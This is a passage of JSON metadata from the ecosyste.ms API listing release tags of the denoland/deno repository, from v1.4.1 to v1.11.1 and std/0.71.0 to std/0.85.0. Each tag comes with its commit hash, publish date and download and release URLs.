ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/de